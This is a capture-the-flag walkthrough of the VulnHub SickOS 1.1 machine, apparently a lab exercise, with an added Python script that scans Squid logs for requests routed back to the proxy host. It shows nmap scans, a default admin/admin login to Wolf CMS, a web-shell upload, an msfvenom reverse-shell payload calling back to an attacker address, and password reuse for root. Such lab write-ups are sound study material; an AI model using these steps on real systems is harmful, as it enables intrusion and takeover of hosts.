vulnhub-sickos1.1
forg12

Overview

Host discovery

sudo nmap -sP 192.168.2.0/24          

Nmap scan report for 192.168.2.186
Host is up (0.11s latency).

Port scanning

nmap -p- -Pn 192.168.2.186
Starting Nmap 7.92 ( https://nmap.org )
Stats: 0:00:45 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 31.73% done; ETC: 15:56 (0:01:37 remaining)
Nmap scan report for 192.168.2.186
Host is up (0.011s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
3128/tcp open squid-http
8080/tcp closed http-proxy

Nmap done: 1 IP address (1 host up) scanned in 122.47 seconds

Service detection

nmap -p22,3128,8080 -sV -A -T4 -Pn 192.168.2.186
Starting Nmap 7.92 ( https://nmap.org )
Nmap scan report for 192.168.2.186
Host is up (0.0065s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 09:3d:29:a0:da:48:14:c1:65:14:1e:6a:6c:37:04:09 (DSA)
| 2048 84:63:e9:a8:8e:99:33:48:db:f6:d5:81:ab:f2:08:ec (RSA)
|_ 256 51:f6:eb:09:f6:b3:e6:91:ae:36:37:0c:c8:ee:34:27 (ECDSA)
3128/tcp open http-proxy Squid http proxy 3.1.19
|_http-title: ERROR: The requested URL could not be retrieved
|_http-server-header: squid/3.1.19
8080/tcp closed http-proxy
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.44 seconds

Information gathering

Port 80 is only reachable through the target's proxy on port 3128.
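
From the defender's side, this means the Squid proxy relays requests to a service on its own host that is filtered from the outside. As an added example (not part of the original write-up), the script below scans Squid native-format access.log lines for such requests; the log lines are constructed, and the list of the proxy's own addresses is an assumed input.

```python
import ipaddress
from urllib.parse import urlsplit

# Constructed sample lines in Squid's native access.log format (not taken from the page).
SAMPLE_LOG = """\
1660809914.123     45 192.168.2.192 TCP_MISS/200 3456 GET http://192.168.2.186/robots.txt - DIRECT/192.168.2.186 text/plain
1660809920.456     30 192.168.2.192 TCP_MISS/200 5120 GET http://127.0.0.1/ - DIRECT/127.0.0.1 text/html
1660809931.789    120 192.168.2.50 TCP_MISS/200 9000 GET http://example.com/index.html - DIRECT/93.184.216.34 text/html
1660809940.002      0 192.168.2.192 TCP_DENIED/403 3800 GET http://192.168.2.186/ - NONE/- text/html
truncated line
"""

def parse_line(line):
    """Split one native-format line into the fields used below; None if malformed."""
    f = line.split()
    if len(f) < 10:
        return None
    try:
        action, _status = f[3].split("/", 1)
        peer = f[8].split("/", 1)[1]
        url = f[6] if "://" in f[6] else "//" + f[6]  # CONNECT logs bare host:port
        host = urlsplit(url).hostname or ""
    except (ValueError, IndexError):
        return None
    return {"client": f[2], "action": action, "url": f[6], "peer": peer, "host": host}

def targets_proxy_host(entry, proxy_addrs):
    """True if the destination is loopback or one of the proxy's own addresses."""
    for candidate in (entry["peer"], entry["host"]):
        try:
            ip = ipaddress.ip_address(candidate)
        except ValueError:
            continue  # DNS name, or "-" when no upstream was contacted
        if ip.is_loopback or ip in proxy_addrs:
            return True
    return False

def find_self_proxying(log_text, proxy_addrs):
    """Return entries where the proxy was asked to reach services on itself."""
    own = {ipaddress.ip_address(a) for a in proxy_addrs}
    hits = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry and targets_proxy_host(entry, own):
            entry["served"] = entry["action"] != "TCP_DENIED"
            hits.append(entry)
    return hits

if __name__ == "__main__":
    for h in find_self_proxying(SAMPLE_LOG, ["192.168.2.186"]):
        print(h["client"], h["url"], "served" if h["served"] else "denied")
```

On the Squid side, the matching control is an `http_access deny` rule on a `dst` ACL that covers loopback and the proxy host's own addresses.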


robots.txt


Exploitation

Search the web for "wolf cms exploit".


Visit the vulnerable URL.

http://192.168.2.186/wolfcms/?/admin/plugin/file_manager/browse/

A login prompt appears; enter admin/admin to log in.


The upload succeeds.


The connection succeeds, but note that the proxy has to be configured in AntSword.


This gives low-privilege access.


Privilege escalation

msf

Give msf a session, then use local_exploit_suggester to check whether there are any exploitable vulnerabilities.

msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.2.192 lport=3311 -f elf > a.elf

use post/multi/recon/local_exploit_suggester   


Linpeas.sh


The sickos user is in the sudo group, and the password collected for the MySQL root account also works for logging in as the sickos user.


flag
